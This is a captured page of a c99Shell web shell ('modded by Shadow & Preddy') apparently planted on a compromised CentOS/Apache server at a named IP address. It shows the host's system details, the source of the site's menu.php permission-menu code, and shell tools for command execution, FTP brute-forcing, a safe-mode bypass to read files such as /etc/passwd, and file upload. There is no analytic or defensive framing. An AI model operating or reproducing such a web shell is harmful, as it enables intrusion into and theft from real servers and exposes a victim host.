110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x Free 52.32 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/ drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: menu.php (2.25 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

\n"; echo "var myMenu ="; //include_once("global.php"); //include_once("../class/clsConnection.php"); //include_once("../class/clsDB.php"); include_once("clsUmMenu.php"); include_once("clsUmPermission.php"); include_once("clsUmGPermission.php"); $oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']); $oUp = new umpermission($oC); $oGp = new umgpermission($oC); $oMmn = new ummenu($oC); if ($oC && $UsID <> "" && $StID <> "") { $StrMenu = "[ \n"; $oMmn->RSMainMenuBySt($StID); while ($oMmn->GetRecord()){ Showmenu($oMmn->MnID, $UsID, $GpID, 1, $StrMenu, $oC, $oUp, $oGp, $oMmn); } $StrMenu = substr($StrMenu,0,strlen($StrMenu)-1); $StrMenu .= "]"; echo $StrMenu; } else { $StrMenu .= "[]"; echo $StrMenu; } ////////////////////////////////////////////////////////////// function ShowMenu($MnID, $UsID, $GpID, $x, &$StrMenu, &$oC, &$oUp, &$oGp, &$oMmn) { //global $oC; //global $oUp; //global $oGp; //global $StrMenu; //include_once("../class/clsDB.php"); $oMn = new ummenu($oC); $oMn->SearchByKey($MnID); $oMn->GetRecord(); $flg=1; $oUp->SearchByKey($UsID, $MnID); if ($oUp->GetRecord()){ $flg = $oUp->pmX; }else{ $oGp->SearchByKey($GpID, $MnID); if ($oGp->GetRecord()){ $flg = $oGp->gpX; } } if($oMn->MnNameT=="-"){ $StrMenu .= "_cmSplit,\n"; }else{ if ($flg==$x){ $StrMenu .= "["; //-------------- $StrMenu .= ($oMn->MnIcon=="") ? "null," : "'

MnIcon>',"; $StrMenu .= ($flg==1) ? "'$oMn->MnNameT'," : "'$oMn->MnNameT',"; if ($oMn->MnURL=="") $StrMenu .= "null,"; else $StrMenu .= ($flg==1) ? "'$oMn->MnURL?MnID=$MnID'," : "null,"; $StrMenu .= "'_self', "; $StrMenu .= ($oMn->MnDesc=="") ? "null," : "'$oMn->MnDesc',"; //--------------- $oMn->RSmenuByParentMn($MnID); } //if flg while ($oMn->GetRecord()){ ShowMenu($oMn->MnID, $UsID, $GpID, $flg, $StrMenu, $oC, $oUp, $oGp, $oMmn); } if ($flg==$x){ $StrMenu = substr($StrMenu,0,strlen($StrMenu)-1); $StrMenu .= "],\n"; } } //else - } ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--